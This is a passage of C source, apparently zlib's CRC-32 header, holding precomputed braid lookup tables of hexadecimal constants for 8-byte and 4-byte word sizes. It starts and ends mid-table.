0x993e1a8c00000000, 0x48d6fd8200000000, 0x7f4c4aaa00000000, 0xaea4ada400000000, 0xdd9d85b700000000, 0x0c7562b900000000, 0x8471301e00000000, 0x5599d71000000000, 0x26a0ff0300000000, 0xf748180d00000000, 0xc0d2af2500000000, 0x113a482b00000000, 0x6203603800000000, 0xb3eb873600000000, 0x0c370f6900000000, 0xdddfe86700000000, 0xaee6c07400000000, 0x7f0e277a00000000, 0x4894905200000000, 0x997c775c00000000, 0xea455f4f00000000, 0x3badb84100000000, 0x94fc4ef000000000, 0x4514a9fe00000000, 0x362d81ed00000000, 0xe7c566e300000000, 0xd05fd1cb00000000, 0x01b736c500000000, 0x728e1ed600000000, 0xa366f9d800000000, 0x1cba718700000000, 0xcd52968900000000, 0xbe6bbe9a00000000, 0x6f83599400000000, 0x5819eebc00000000, 0x89f109b200000000, 0xfac821a100000000, 0x2b20c6af00000000, 0xe56dbc1900000000, 0x34855b1700000000, 0x47bc730400000000, 0x9654940a00000000, 0xa1ce232200000000, 0x7026c42c00000000, 0x031fec3f00000000, 0xd2f70b3100000000, 0x6d2b836e00000000, 0xbcc3646000000000, 0xcffa4c7300000000, 0x1e12ab7d00000000, 0x29881c5500000000, 0xf860fb5b00000000, 0x8b59d34800000000, 0x5ab1344600000000, 0xf5e0c2f700000000, 0x240825f900000000, 0x57310dea00000000, 0x86d9eae400000000, 0xb1435dcc00000000, 0x60abbac200000000, 0x139292d100000000, 0xc27a75df00000000, 0x7da6fd8000000000, 0xac4e1a8e00000000, 0xdf77329d00000000, 0x0e9fd59300000000, 0x390562bb00000000, 0xe8ed85b500000000, 0x9bd4ada600000000, 0x4a3c4aa800000000, 0x4649281100000000, 0x97a1cf1f00000000, 0xe498e70c00000000, 0x3570000200000000, 0x02eab72a00000000, 0xd302502400000000, 0xa03b783700000000, 0x71d39f3900000000, 0xce0f176600000000, 0x1fe7f06800000000, 0x6cded87b00000000, 0xbd363f7500000000, 0x8aac885d00000000, 0x5b446f5300000000, 0x287d474000000000, 0xf995a04e00000000, 0x56c456ff00000000, 0x872cb1f100000000, 0xf41599e200000000, 0x25fd7eec00000000, 0x1267c9c400000000, 0xc38f2eca00000000, 0xb0b606d900000000, 0x615ee1d700000000, 0xde82698800000000, 0x0f6a8e8600000000, 0x7c53a69500000000, 0xadbb419b00000000, 0x9a21f6b300000000, 0x4bc911bd00000000, 0x38f039ae00000000, 0xe918dea000000000, 0x2755a41600000000, 0xf6bd431800000000, 0x85846b0b00000000, 0x546c8c0500000000, 0x63f63b2d00000000, 0xb21edc2300000000, 0xc127f43000000000, 0x10cf133e00000000, 0xaf139b6100000000, 0x7efb7c6f00000000, 0x0dc2547c00000000, 0xdc2ab37200000000, 0xebb0045a00000000, 0x3a58e35400000000, 0x4961cb4700000000, 0x98892c4900000000, 0x37d8daf800000000, 0xe6303df600000000, 0x950915e500000000, 0x44e1f2eb00000000, 0x737b45c300000000, 0xa293a2cd00000000, 0xd1aa8ade00000000, 0x00426dd000000000, 0xbf9ee58f00000000, 0x6e76028100000000, 0x1d4f2a9200000000, 0xcca7cd9c00000000, 0xfb3d7ab400000000, 0x2ad59dba00000000, 0x59ecb5a900000000, 0x880452a700000000}, {0x0000000000000000, 0xaa05daf100000000, 0x150dc53800000000, 0xbf081fc900000000, 0x2a1a8a7100000000, 0x801f508000000000, 0x3f174f4900000000, 0x951295b800000000, 0x543414e300000000, 0xfe31ce1200000000, 0x4139d1db00000000, 0xeb3c0b2a00000000, 0x7e2e9e9200000000, 0xd42b446300000000, 0x6b235baa00000000, 0xc126815b00000000, 0xe96e591d00000000, 0x436b83ec00000000, 0xfc639c2500000000, 0x566646d400000000, 0xc374d36c00000000, 0x6971099d00000000, 0xd679165400000000, 0x7c7ccca500000000, 0xbd5a4dfe00000000, 0x175f970f00000000, 0xa85788c600000000, 0x0252523700000000, 0x9740c78f00000000, 0x3d451d7e00000000, 0x824d02b700000000, 0x2848d84600000000, 0xd2ddb23a00000000, 0x78d868cb00000000, 0xc7d0770200000000, 0x6dd5adf300000000, 0xf8c7384b00000000, 0x52c2e2ba00000000, 0xedcafd7300000000, 0x47cf278200000000, 0x86e9a6d900000000, 0x2cec7c2800000000, 0x93e463e100000000, 0x39e1b91000000000, 0xacf32ca800000000, 0x06f6f65900000000, 0xb9fee99000000000, 0x13fb336100000000, 0x3bb3eb2700000000, 0x91b631d600000000, 0x2ebe2e1f00000000, 0x84bbf4ee00000000, 0x11a9615600000000, 0xbbacbba700000000, 0x04a4a46e00000000, 0xaea17e9f00000000, 0x6f87ffc400000000, 0xc582253500000000, 0x7a8a3afc00000000, 0xd08fe00d00000000, 0x459d75b500000000, 0xef98af4400000000, 0x5090b08d00000000, 0xfa956a7c00000000, 0xa4bb657500000000, 0x0ebebf8400000000, 0xb1b6a04d00000000, 0x1bb37abc00000000, 0x8ea1ef0400000000, 0x24a435f500000000, 0x9bac2a3c00000000, 0x31a9f0cd00000000, 0xf08f719600000000, 0x5a8aab6700000000, 0xe582b4ae00000000, 0x4f876e5f00000000, 0xda95fbe700000000, 0x7090211600000000, 0xcf983edf00000000, 0x659de42e00000000, 0x4dd53c6800000000, 0xe7d0e69900000000, 0x58d8f95000000000, 0xf2dd23a100000000, 0x67cfb61900000000, 0xcdca6ce800000000, 0x72c2732100000000, 0xd8c7a9d000000000, 0x19e1288b00000000, 0xb3e4f27a00000000, 0x0cecedb300000000, 0xa6e9374200000000, 0x33fba2fa00000000, 0x99fe780b00000000, 0x26f667c200000000, 0x8cf3bd3300000000, 0x7666d74f00000000, 0xdc630dbe00000000, 0x636b127700000000, 0xc96ec88600000000, 0x5c7c5d3e00000000, 0xf67987cf00000000, 0x4971980600000000, 0xe37442f700000000, 0x2252c3ac00000000, 0x8857195d00000000, 0x375f069400000000, 0x9d5adc6500000000, 0x084849dd00000000, 0xa24d932c00000000, 0x1d458ce500000000, 0xb740561400000000, 0x9f088e5200000000, 0x350d54a300000000, 0x8a054b6a00000000, 0x2000919b00000000, 0xb512042300000000, 0x1f17ded200000000, 0xa01fc11b00000000, 0x0a1a1bea00000000, 0xcb3c9ab100000000, 0x6139404000000000, 0xde315f8900000000, 0x7434857800000000, 0xe12610c000000000, 0x4b23ca3100000000, 0xf42bd5f800000000, 0x5e2e0f0900000000, 0x4877cbea00000000, 0xe272111b00000000, 0x5d7a0ed200000000, 0xf77fd42300000000, 0x626d419b00000000, 0xc8689b6a00000000, 0x776084a300000000, 0xdd655e5200000000, 0x1c43df0900000000, 0xb64605f800000000, 0x094e1a3100000000, 0xa34bc0c000000000, 0x3659557800000000, 0x9c5c8f8900000000, 0x2354904000000000, 0x89514ab100000000, 0xa11992f700000000, 0x0b1c480600000000, 0xb41457cf00000000, 0x1e118d3e00000000, 0x8b03188600000000, 0x2106c27700000000, 0x9e0eddbe00000000, 0x340b074f00000000, 0xf52d861400000000, 0x5f285ce500000000, 0xe020432c00000000, 0x4a2599dd00000000, 0xdf370c6500000000, 0x7532d69400000000, 0xca3ac95d00000000, 0x603f13ac00000000, 0x9aaa79d000000000, 0x30afa32100000000, 0x8fa7bce800000000, 0x25a2661900000000, 0xb0b0f3a100000000, 0x1ab5295000000000, 0xa5bd369900000000, 0x0fb8ec6800000000, 0xce9e6d3300000000, 0x649bb7c200000000, 0xdb93a80b00000000, 0x719672fa00000000, 0xe484e74200000000, 0x4e813db300000000, 0xf189227a00000000, 0x5b8cf88b00000000, 0x73c420cd00000000, 0xd9c1fa3c00000000, 0x66c9e5f500000000, 0xcccc3f0400000000, 0x59deaabc00000000, 0xf3db704d00000000, 0x4cd36f8400000000, 0xe6d6b57500000000, 0x27f0342e00000000, 0x8df5eedf00000000, 0x32fdf11600000000, 0x98f82be700000000, 0x0deabe5f00000000, 0xa7ef64ae00000000, 0x18e77b6700000000, 0xb2e2a19600000000, 0xecccae9f00000000, 0x46c9746e00000000, 0xf9c16ba700000000, 0x53c4b15600000000, 0xc6d624ee00000000, 0x6cd3fe1f00000000, 0xd3dbe1d600000000, 0x79de3b2700000000, 0xb8f8ba7c00000000, 0x12fd608d00000000, 0xadf57f4400000000, 0x07f0a5b500000000, 0x92e2300d00000000, 0x38e7eafc00000000, 0x87eff53500000000, 0x2dea2fc400000000, 0x05a2f78200000000, 0xafa72d7300000000, 0x10af32ba00000000, 0xbaaae84b00000000, 0x2fb87df300000000, 0x85bda70200000000, 0x3ab5b8cb00000000, 0x90b0623a00000000, 0x5196e36100000000, 0xfb93399000000000, 0x449b265900000000, 0xee9efca800000000, 0x7b8c691000000000, 0xd189b3e100000000, 0x6e81ac2800000000, 0xc48476d900000000, 0x3e111ca500000000, 0x9414c65400000000, 0x2b1cd99d00000000, 0x8119036c00000000, 0x140b96d400000000, 0xbe0e4c2500000000, 0x010653ec00000000, 0xab03891d00000000, 0x6a25084600000000, 0xc020d2b700000000, 0x7f28cd7e00000000, 0xd52d178f00000000, 0x403f823700000000, 0xea3a58c600000000, 0x5532470f00000000, 0xff379dfe00000000, 0xd77f45b800000000, 0x7d7a9f4900000000, 0xc272808000000000, 0x68775a7100000000, 0xfd65cfc900000000, 0x5760153800000000, 0xe8680af100000000, 0x426dd00000000000, 0x834b515b00000000, 0x294e8baa00000000, 0x9646946300000000, 0x3c434e9200000000, 0xa951db2a00000000, 0x035401db00000000, 0xbc5c1e1200000000, 0x1659c4e300000000}}; #else /* W == 4 */ local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0xae689191, 0x87a02563, 0x29c8b4f2, 0xd4314c87, 0x7a59dd16, 0x539169e4, 0xfdf9f875, 0x73139f4f, 0xdd7b0ede, 0xf4b3ba2c, 0x5adb2bbd, 0xa722d3c8, 0x094a4259, 0x2082f6ab, 0x8eea673a, 0xe6273e9e, 0x484faf0f, 0x61871bfd, 0xcfef8a6c, 0x32167219, 0x9c7ee388, 0xb5b6577a, 0x1bdec6eb, 0x9534a1d1, 0x3b5c3040, 0x129484b2, 0xbcfc1523, 0x4105ed56, 0xef6d7cc7, 0xc6a5c835, 0x68cd59a4, 0x173f7b7d, 0xb957eaec, 0x909f5e1e, 0x3ef7cf8f, 0xc30e37fa, 0x6d66a66b, 0x44ae1299, 0xeac68308, 0x642ce432, 0xca4475a3, 0xe38cc151, 0x4de450c0, 0xb01da8b5, 0x1e753924, 0x37bd8dd6, 0x99d51c47, 0xf11845e3, 0x5f70d472, 0x76b86080, 0xd8d0f111, 0x25290964, 0x8b4198f5, 0xa2892c07, 0x0ce1bd96, 0x820bdaac, 0x2c634b3d, 0x05abffcf, 0xabc36e5e, 0x563a962b, 0xf85207ba, 0xd19ab348, 0x7ff222d9, 0x2e7ef6fa, 0x8016676b, 0xa9ded399, 0x07b64208, 0xfa4fba7d, 0x54272bec, 0x7def9f1e, 0xd3870e8f, 0x5d6d69b5, 0xf305f824, 0xdacd4cd6, 0x74a5dd47, 0x895c2532, 0x2734b4a3, 0x0efc0051, 0xa09491c0, 0xc859c864, 0x663159f5, 0x4ff9ed07, 0xe1917c96, 0x1c6884e3, 0xb2001572, 0x9bc8a180, 0x35a03011, 0xbb4a572b, 0x1522c6ba, 0x3cea7248, 0x9282e3d9, 0x6f7b1bac, 0xc1138a3d, 0xe8db3ecf, 0x46b3af5e, 0x39418d87, 0x97291c16, 0xbee1a8e4, 0x10893975, 0xed70c100, 0x43185091, 0x6ad0e463, 0xc4b875f2, 0x4a5212c8, 0xe43a8359, 0xcdf237ab, 0x639aa63a, 0x9e635e4f, 0x300bcfde, 0x19c37b2c, 0xb7abeabd, 0xdf66b319, 0x710e2288, 0x58c6967a, 0xf6ae07eb, 0x0b57ff9e, 0xa53f6e0f, 0x8cf7dafd, 0x229f4b6c, 0xac752c56, 0x021dbdc7, 0x2bd50935, 0x85bd98a4, 0x784460d1, 0xd62cf140, 0xffe445b2, 0x518cd423, 0x5cfdedf4, 0xf2957c65, 0xdb5dc897, 0x75355906, 0x88cca173, 0x26a430e2, 0x0f6c8410, 0xa1041581, 0x2fee72bb, 0x8186e32a, 0xa84e57d8, 0x0626c649, 0xfbdf3e3c, 0x55b7afad, 0x7c7f1b5f, 0xd2178ace, 0xbadad36a, 0x14b242fb, 0x3d7af609, 0x93126798, 0x6eeb9fed, 0xc0830e7c, 0xe94bba8e, 0x47232b1f, 0xc9c94c25, 0x67a1ddb4, 0x4e696946, 0xe001f8d7, 0x1df800a2, 0xb3909133, 0x9a5825c1, 0x3430b450, 0x4bc29689, 0xe5aa0718, 0xcc62b3ea, 0x620a227b, 0x9ff3da0e, 0x319b4b9f, 0x1853ff6d, 0xb63b6efc, 0x38d109c6, 0x96b99857, 0xbf712ca5, 0x1119bd34, 0xece04541, 0x4288d4d0, 0x6b406022, 0xc528f1b3, 0xade5a817, 0x038d3986, 0x2a458d74, 0x842d1ce5, 0x79d4e490, 0xd7bc7501, 0xfe74c1f3, 0x501c5062, 0xdef63758, 0x709ea6c9, 0x5956123b, 0xf73e83aa, 0x0ac77bdf, 0xa4afea4e, 0x8d675ebc, 0x230fcf2d, 0x72831b0e, 0xdceb8a9f, 0xf5233e6d, 0x5b4baffc, 0xa6b25789, 0x08dac618, 0x211272ea, 0x8f7ae37b, 0x01908441, 0xaff815d0, 0x8630a122, 0x285830b3, 0xd5a1c8c6, 0x7bc95957, 0x5201eda5, 0xfc697c34, 0x94a42590, 0x3accb401, 0x130400f3, 0xbd6c9162, 0x40956917, 0xeefdf886, 0xc7354c74, 0x695ddde5, 0xe7b7badf, 0x49df2b4e, 0x60179fbc, 0xce7f0e2d, 0x3386f658, 0x9dee67c9, 0xb426d33b, 0x1a4e42aa, 0x65bc6073, 0xcbd4f1e2, 0xe21c4510, 0x4c74d481, 0xb18d2cf4, 0x1fe5bd65, 0x362d0997, 0x98459806, 0x16afff3c, 0xb8c76ead, 0x910fda5f, 0x3f674bce, 0xc29eb3bb, 0x6cf6222a, 0x453e96d8, 0xeb560749, 0x839b5eed, 0x2df3cf7c, 0x043b7b8e, 0xaa53ea1f, 0x57aa126a, 0xf9c283fb, 0xd00a3709, 0x7e62a698, 0xf088c1a2, 0x5ee05033, 0x7728e4c1, 0xd9407550, 0x24b98d25, 0x8ad11cb4, 0xa319a846, 0x0d7139d7}, {0x00000000, 0xb9fbdbe8, 0xa886b191, 0x117d6a79, 0x8a7c6563, 0x3387be8b, 0x22fad4f2, 0x9b010f1a, 0xcf89cc87, 0x7672176f, 0x670f7d16, 0xdef4a6fe, 0x45f5a9e4, 0xfc0e720c, 0xed731875, 0x5488c39d, 0x44629f4f, 0xfd9944a7, 0xece42ede, 0x551ff536, 0xce1efa2c, 0x77e521c4, 0x66984bbd, 0xdf639055, 0x8beb53c8, 0x32108820, 0x236de259, 0x9a9639b1, 0x019736ab, 0xb86ced43, 0xa911873a, 0x10ea5cd2, 0x88c53e9e, 0x313ee576, 0x20438f0f, 0x99b854e7, 0x02b95bfd, 0xbb428015, 0xaa3fea6c, 0x13c43184, 0x474cf219, 0xfeb729f1, 0xefca4388, 0x56319860, 0xcd30977a, 0x74cb4c92, 0x65b626eb, 0xdc4dfd03, 0xcca7a1d1, 0x755c7a39, 0x64211040, 0xdddacba8, 0x46dbc4b2, 0xff201f5a, 0xee5d7523, 0x57a6aecb, 0x032e6d56, 0xbad5b6be, 0xaba8dcc7, 0x1253072f, 0x89520835, 0x30a9d3dd, 0x21d4b9a4, 0x982f624c, 0xcafb7b7d, 0x7300a095, 0x627dcaec, 0xdb861104, 0x40871e1e, 0xf97cc5f6, 0xe801af8f, 0x51fa7467, 0x0572b7fa, 0xbc896c12, 0xadf4066b, 0x140fdd83, 0x8f0ed299, 0x36f50971, 0x27886308, 0x9e73b8e0, 0x8e99e432, 0x37623fda, 0x261f55a3, 0x9fe48e4b, 0x04e58151, 0xbd1e5ab9, 0xac6330c0, 0x1598eb28, 0x411028b5, 0xf8ebf35d, 0xe9969924, 0x506d42cc, 0xcb6c4dd6, 0x7297963e, 0x63eafc47, 0xda1127af, 0x423e45e3, 0xfbc59e0b, 0xeab8f472, 0x53432f9a, 0xc8422080, 0x71b9fb68, 0x60c49111, 0xd93f4af9, 0x8db78964, 0x344c528c, 0x253138f5, 0x9ccae31d, 0x07cbec07, 0xbe3037ef, 0xaf4d5d96, 0x16b6867e, 0x065cdaac, 0xbfa70144, 0xaeda6b3d, 0x1721b0d5, 0x8c20bfcf, 0x35db6427, 0x24a60e5e, 0x9d5dd5b6, 0xc9d5162b, 0x702ecdc3, 0x6153a7ba, 0xd8a87c52, 0x43a97348, 0xfa52a8a0, 0xeb2fc2d9, 0x52d41931, 0x4e87f0bb, 0xf77c2b53, 0xe601412a, 0x5ffa9ac2, 0xc4fb95d8, 0x7d004e30, 0x6c7d2449, 0xd586ffa1, 0x810e3c3c, 0x38f5e7d4, 0x29888dad, 0x90735645, 0x0b72595f, 0xb28982b7, 0xa3f4e8ce, 0x1a0f3326, 0x0ae56ff4, 0xb31eb41c, 0xa263de65, 0x1b98058d, 0x80990a97, 0x3962d17f, 0x281fbb06, 0x91e460ee, 0xc56ca373, 0x7c97789b, 0x6dea12e2, 0xd411c90a, 0x4f10c610, 0xf6eb1df8, 0xe7967781, 0x5e6dac69, 0xc642ce25, 0x7fb915cd, 0x6ec47fb4, 0xd73fa45c, 0x4c3eab46, 0xf5c570ae, 0xe4b81ad7, 0x5d43c13f, 0x09cb02a2, 0xb030d94a, 0xa14db333, 0x18b668db, 0x83b767c1, 0x3a4cbc29, 0x2b31d650, 0x92ca0db8, 0x8220516a, 0x3bdb8a82, 0x2aa6e0fb, 0x935d3b13, 0x085c3409, 0xb1a7efe1, 0xa0da8598, 0x19215e70, 0x4da99ded, 0xf4524605, 0xe52f2c7c, 0x5cd4f794, 0xc7d5f88e, 0x7e2e2366, 0x6f53491f, 0xd6a892f7, 0x847c8bc6, 0x3d87502e, 0x2cfa3a57, 0x9501e1bf, 0x0e00eea5, 0xb7fb354d, 0xa6865f34, 0x1f7d84dc, 0x4bf54741, 0xf20e9ca9, 0xe373f6d0, 0x5a882d38, 0xc1892222, 0x7872f9ca, 0x690f93b3, 0xd0f4485b, 0xc01e1489, 0x79e5cf61, 0x6898a518, 0xd1637ef0, 0x4a6271ea, 0xf399aa02, 0xe2e4c07b, 0x5b1f1b93, 0x0f97d80e, 0xb66c03e6, 0xa711699f, 0x1eeab277, 0x85ebbd6d, 0x3c106685, 0x2d6d0cfc, 0x9496d714, 0x0cb9b558, 0xb5426eb0, 0xa43f04c9, 0x1dc4df21, 0x86c5d03b, 0x3f3e0bd3, 0x2e4361aa, 0x97b8ba42, 0xc33079df, 0x7acba237, 0x6bb6c84e, 0xd24d13a6, 0x494c1cbc, 0xf0b7c754, 0xe1caad2d, 0x583176c5, 0x48db2a17, 0xf120f1ff, 0xe05d9b86, 0x59a6406e, 0xc2a74f74, 0x7b5c949c, 0x6a21fee5, 0xd3da250d, 0x8752e690, 0x3ea93d78, 0x2fd45701, 0x962f8ce9, 0x0d2e83f3, 0xb4d5581b, 0xa5a83262, 0x1c53e98a}, {0x00000000, 0x9d0fe176, 0xe16ec4ad, 0x7c6125db, 0x19ac8f1b, 0x84a36e6d, 0xf8c24bb6, 0x65cdaac0, 0x33591e36, 0xae56ff40, 0xd237da9b, 0x4f383bed, 0x2af5912d, 0xb7fa705b, 0xcb9b5580, 0x5694b4f6, 0x66b23c6c, 0xfbbddd1a, 0x87dcf8c1, 0x1ad319b7, 0x7f1eb377, 0xe2115201, 0x9e7077da, 0x037f96ac, 0x55eb225a, 0xc8e4c32c, 0xb485e6f7, 0x298a0781, 0x4c47ad41, 0xd1484c37, 0xad2969ec, 0x3026889a, 0xcd6478d8, 0x506b99ae, 0x2c0abc75, 0xb1055d03, 0xd4c8f7c3, 0x49c716b5, 0x35a6336e, 0xa8a9d218, 0xfe3d66ee, 0x63328798, 0x1f53a243, 0x825c4335, 0xe791e9f5, 0x7a9e0883, 0x06ff2d58, 0x9bf0cc2e, 0xabd644b4, 0x36d9a5c2, 0x4ab88019, 0xd7b7616f, 0xb27acbaf, 0x2f752ad9, 0x53140f02, 0xce1bee74, 0x988f5a82, 0x0580bbf4, 0x79e19e2f, 0xe4ee7f59, 0x8123d599, 0x1c2c34ef, 0x604d1134, 0xfd42f042, 0x41b9f7f1, 0xdcb61687, 0xa0d7335c, 0x3dd8d22a, 0x581578ea, 0xc51a999c, 0xb97bbc47, 0x24745d31, 0x72e0e9c7, 0xefef08b1, 0x938e2d6a, 0x0e81cc1c, 0x6b4c66dc, 0xf64387aa, 0x8a22a271, 0x172d4307, 0x270bcb9d, 0xba042aeb, 0xc6650f30, 0x5b6aee46, 0x3ea74486, 0xa3a8a5f0, 0xdfc9802b, 0x42c6615d, 0x1452d5ab, 0x895d34dd, 0xf53c1106, 0x6833f070, 0x0dfe5ab0, 0x90f1bbc6, 0xec909e1d, 0x719f7f6b, 0x8cdd8f29, 0x11d26e5f, 0x6db34b84, 0xf0bcaaf2, 0x95710032, 0x087ee144, 0x741fc49f, 0xe91025e9, 0xbf84911f, 0x228b7069, 0x5eea55b2, 0xc3e5b4c4, 0xa6281e04, 0x3b27ff72, 0x4746daa9, 0xda493bdf, 0xea6fb345, 0x77605233, 0x0b0177e8, 0x960e969e, 0xf3c33c5e, 0x6eccdd28, 0x12adf8f3, 0x8fa21985, 0xd936ad73, 0x44394c05, 0x385869de, 0xa55788a8, 0xc09a2268, 0x5d95c31e, 0x21f4e6c5, 0xbcfb07b3, 0x8373efe2, 0x1e7c0e94, 0x621d2b4f, 0xff12ca39, 0x9adf60f9, 0x07d0818f, 0x7bb1a454, 0xe6be4522, 0xb02af1d4, 0x2d2510a2, 0x51443579, 0xcc4bd40f, 0xa9867ecf, 0x34899fb9, 0x48e8ba62, 0xd5e75b14, 0xe5c1d38e, 0x78ce32f8, 0x04af1723, 0x99a0f655, 0xfc6d5c95, 0x6162bde3, 0x1d039838, 0x800c794e, 0xd698cdb8, 0x4b972cce, 0x37f60915, 0xaaf9e863, 0xcf3442a3, 0x523ba3d5, 0x2e5a860e, 0xb3556778, 0x4e17973a, 0xd318764c, 0xaf795397, 0x3276b2e1, 0x57bb1821, 0xcab4f957, 0xb6d5dc8c, 0x2bda3dfa, 0x7d4e890c, 0xe041687a, 0x9c204da1, 0x012facd7, 0x64e20617, 0xf9ede761, 0x858cc2ba, 0x188323cc, 0x28a5ab56, 0xb5aa4a20, 0xc9cb6ffb, 0x54c48e8d, 0x3109244d, 0xac06c53b, 0xd067e0e0, 0x4d680196, 0x1bfcb560, 0x86f35416, 0xfa9271cd, 0x679d90bb, 0x02503a7b, 0x9f5fdb0d, 0xe33efed6, 0x7e311fa0, 0xc2ca1813, 0x5fc5f965, 0x23a4dcbe, 0xbeab3dc8, 0xdb669708, 0x4669767e, 0x3a0853a5, 0xa707b2d3, 0xf1930625, 0x6c9ce753, 0x10fdc288, 0x8df223fe, 0xe83f893e, 0x75306848, 0x09514d93, 0x945eace5, 0xa478247f, 0x3977c509, 0x4516e0d2, 0xd81901a4, 0xbdd4ab64, 0x20db4a12, 0x5cba6fc9, 0xc1b58ebf, 0x97213a49, 0x0a2edb3f, 0x764ffee4, 0xeb401f92, 0x8e8db552, 0x13825424, 0x6fe371ff, 0xf2ec9089, 0x0fae60cb, 0x92a181bd, 0xeec0a466, 0x73cf4510, 0x1602efd0, 0x8b0d0ea6, 0xf76c2b7d, 0x6a63ca0b, 0x3cf77efd, 0xa1f89f8b, 0xdd99ba50, 0x40965b26, 0x255bf1e6, 0xb8541090, 0xc435354b, 0x593ad43d, 0x691c5ca7, 0xf413bdd1, 0x8872980a, 0x157d797c, 0x70b0d3bc, 0xedbf32ca, 0x91de1711, 0x0cd1f667, 0x5a454291, 0xc74aa3e7, 0xbb2b863c, 0x2624674a, 0x43e9cd8a, 0xdee62cfc, 0xa2870927, 0x3f88e851}, {0x00000000, 0xdd96d985, 0x605cb54b, 0xbdca6cce, 0xc0b96a96, 0x1d2fb313, 0xa0e5dfdd, 0x7d730658, 0x5a03d36d, 0x87950ae8, 0x3a5f6626, 0xe7c9bfa3, 0x9abab9fb, 0x472c607e, 0xfae60cb0, 0x2770d535, 0xb407a6da, 0x69917f5f, 0xd45b1391, 0x09cdca14, 0x74becc4c, 0xa92815c9, 0x14e27907, 0xc974a082, 0xee0475b7, 0x3392ac32, 0x8e58c0fc, 0x53ce1979, 0x2ebd1f21, 0xf32bc6a4, 0x4ee1aa6a, 0x937773ef, 0xb37e4bf5, 0x6ee89270, 0xd322febe, 0x0eb4273b, 0x73c72163, 0xae51f8e6, 0x139b9428, 0xce0d4dad, 0xe97d9898, 0x34eb411d, 0x89212dd3, 0x54b7f456, 0x29c4f20e, 0xf4522b8b, 0x49984745, 0x940e9ec0, 0x0779ed2f, 0xdaef34aa, 0x67255864, 0xbab381e1, 0xc7c087b9, 0x1a565e3c, 0xa79c32f2, 0x7a0aeb77, 0x5d7a3e42, 0x80ece7c7, 0x3d268b09, 0xe0b0528c, 0x9dc354d4, 0x40558d51, 0xfd9fe19f, 0x2009381a, 0xbd8d91ab, 0x601b482e, 0xddd124e0, 0x0047fd65, 0x7d34fb3d, 0xa0a222b8, 0x1d684e76, 0xc0fe97f3, 0xe78e42c6, 0x3a189b43, 0x87d2f78d, 0x5a442e08, 0x27372850, 0xfaa1f1d5, 0x476b9d1b, 0x9afd449e, 0x098a3771, 0xd41ceef4, 0x69d6823a, 0xb4405bbf, 0xc9335de7, 0x14a58462, 0xa96fe8ac, 0x74f93129, 0x5389e41c, 0x8e1f3d99, 0x33d55157, 0xee4388d2, 0x93308e8a, 0x4ea6570f, 0xf36c3bc1, 0x2efae244, 0x0ef3da5e, 0xd36503db, 0x6eaf6f15, 0xb339b690, 0xce4ab0c8, 0x13dc694d, 0xae160583, 0x7380dc06, 0x54f00933, 0x8966d0b6, 0x34acbc78, 0xe93a65fd, 0x944963a5, 0x49dfba20, 0xf415d6ee, 0x29830f6b, 0xbaf47c84, 0x6762a501, 0xdaa8c9cf, 0x073e104a, 0x7a4d1612, 0xa7dbcf97, 0x1a11a359, 0xc7877adc, 0xe0f7afe9, 0x3d61766c, 0x80ab1aa2, 0x5d3dc327, 0x204ec57f, 0xfdd81cfa, 0x40127034, 0x9d84a9b1, 0xa06a2517, 0x7dfcfc92, 0xc036905c, 0x1da049d9, 0x60d34f81, 0xbd459604, 0x008ffaca, 0xdd19234f, 0xfa69f67a, 0x27ff2fff, 0x9a354331, 0x47a39ab4, 0x3ad09cec, 0xe7464569, 0x5a8c29a7, 0x871af022, 0x146d83cd, 0xc9fb5a48, 0x74313686, 0xa9a7ef03, 0xd4d4e95b, 0x094230de, 0xb4885c10, 0x691e8595, 0x4e6e50a0, 0x93f88925, 0x2e32e5eb, 0xf3a43c6e, 0x8ed73a36, 0x5341e3b3, 0xee8b8f7d, 0x331d56f8, 0x13146ee2, 0xce82b767, 0x7348dba9, 0xaede022c, 0xd3ad0474, 0x0e3bddf1, 0xb3f1b13f, 0x6e6768ba, 0x4917bd8f, 0x9481640a, 0x294b08c4, 0xf4ddd141, 0x89aed719, 0x54380e9c, 0xe9f26252, 0x3464bbd7, 0xa713c838, 0x7a8511bd, 0xc74f7d73, 0x1ad9a4f6, 0x67aaa2ae, 0xba3c7b2b, 0x07f617e5, 0xda60ce60, 0xfd101b55, 0x2086c2d0, 0x9d4cae1e, 0x40da779b, 0x3da971c3, 0xe03fa846, 0x5df5c488, 0x80631d0d, 0x1de7b4bc, 0xc0716d39, 0x7dbb01f7, 0xa02dd872, 0xdd5ede2a, 0x00c807af, 0xbd026b61, 0x6094b2e4, 0x47e467d1, 0x9a72be54, 0x27b8d29a, 0xfa2e0b1f, 0x875d0d47, 0x5acbd4c2, 0xe701b80c, 0x3a976189, 0xa9e01266, 0x7476cbe3, 0xc9bca72d, 0x142a7ea8, 0x695978f0, 0xb4cfa175, 0x0905cdbb, 0xd493143e, 0xf3e3c10b, 0x2e75188e, 0x93bf7440, 0x4e29adc5, 0x335aab9d, 0xeecc7218, 0x53061ed6, 0x8e90c753, 0xae99ff49, 0x730f26cc, 0xcec54a02, 0x13539387, 0x6e2095df, 0xb3b64c5a, 0x0e7c2094, 0xd3eaf911, 0xf49a2c24, 0x290cf5a1, 0x94c6996f, 0x495040ea, 0x342346b2, 0xe9b59f37, 0x547ff3f9, 0x89e92a7c, 0x1a9e5993, 0xc7088016, 0x7ac2ecd8, 0xa754355d, 0xda273305, 0x07b1ea80, 0xba7b864e, 0x67ed5fcb, 0x409d8afe, 0x9d0b537b, 0x20c13fb5, 0xfd57e630, 0x8024e068, 0x5db239ed, 0xe0785523, 0x3dee8ca6}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x00000000, 0x85d996dd, 0x4bb55c60, 0xce6ccabd, 0x966ab9c0, 0x13b32f1d, 0xdddfe5a0, 0x5806737d, 0x6dd3035a, 0xe80a9587, 0x26665f3a, 0xa3bfc9e7, 0xfbb9ba9a, 0x7e602c47, 0xb00ce6fa, 0x35d57027, 0xdaa607b4, 0x5f7f9169, 0x91135bd4, 0x14cacd09, 0x4cccbe74, 0xc91528a9, 0x0779e214, 0x82a074c9, 0xb77504ee, 0x32ac9233, 0xfcc0588e, 0x7919ce53, 0x211fbd2e, 0xa4c62bf3, 0x6aaae14e, 0xef737793, 0xf54b7eb3, 0x7092e86e, 0xbefe22d3, 0x3b27b40e, 0x6321c773, 0xe6f851ae, 0x28949b13, 0xad4d0dce, 0x98987de9, 0x1d41eb34, 0xd32d2189, 0x56f4b754, 0x0ef2c429, 0x8b2b52f4, 0x45479849, 0xc09e0e94, 0x2fed7907, 0xaa34efda, 0x64582567, 0xe181b3ba, 0xb987c0c7, 0x3c5e561a, 0xf2329ca7, 0x77eb0a7a, 0x423e7a5d, 0xc7e7ec80, 